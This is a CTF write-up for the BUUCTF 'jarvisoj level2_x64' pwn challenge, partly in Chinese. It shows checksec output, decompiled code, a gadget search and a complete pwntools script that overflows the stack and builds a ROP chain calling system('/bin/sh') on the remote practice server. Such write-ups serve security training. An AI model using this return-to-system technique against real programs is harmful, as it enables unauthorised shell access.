jarvisoj level2 x64
# jarvisoj level2 x64
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_level2_x64/level2_x64'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
# 静态分析
主函数如下
// Decompiler output (IDA-style signature) for the binary's main().
// The page locates the stack overflow inside vulnerable_function(); its body is not shown here.
int __cdecl main(int argc, const char **argv, const char **envp)
{
// the overflow happens inside this call, i.e. before main() itself returns
vulnerable_function();
// this call is what gives the binary a PLT entry for system() (the "plt 表内有 system" point below)
return system("echo 'Hello World!'");
}
Gadget
# search the binary's string tables for a NUL-terminated "/bin/sh" (result listed below)
ROPgadget --binary level2_x64 --string "/bin/sh\x00"
Strings information
============================================================
0x0000000000600a90 : /bin/sh
# 思路分析
- 目前信息:
  - `vulnerable_function` 函数内有明显的栈溢出漏洞
  - plt 表内有 `system`
  - 存在 `/bin/sh` 字符串
  - No PIE
  - NX 保护开启
- 思路:
  - 可栈溢出,有 `system`,有 `/bin/sh`,构造 rop 链布好栈帧输入即可
# exp
# pwntools script for the level2_x64 practice binary (BUUCTF).
from pwn import *
# amd64 target, matching the checksec output above; debug logging prints every byte sent/received
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level2_x64/level2_x64'
# connect to the practice instance; use the commented process() line below to run the binary locally instead
io = remote('node4.buuoj.cn', 27585)
# io = process(pwnfile)
elf = ELF(pwnfile)
# No PIE (see checksec), so the PLT entry for system() sits at a fixed address
system_addr = elf.plt['system']
# bytes written before the saved return address is reached; presumably a 0x80-byte
# buffer plus 8 bytes of saved rbp — the buffer size is not shown on this page, confirm in vulnerable_function
padding = 0x80+8
# address of the "/bin/sh" string reported by the ROPgadget search above
bin_sh_addr = 0x600A90
# "pop rdi; ret" gadget that loads system()'s first argument; its address is not
# derived on this page — presumably from a ROPgadget listing, verify against the binary
pop_rdi_ret = 0x4006b3
# flat() packs the integers as little-endian 8-byte words according to context.arch
payload = flat(['a'*padding, pop_rdi_ret, bin_sh_addr, system_addr])
io.sendline(payload)
io.interactive()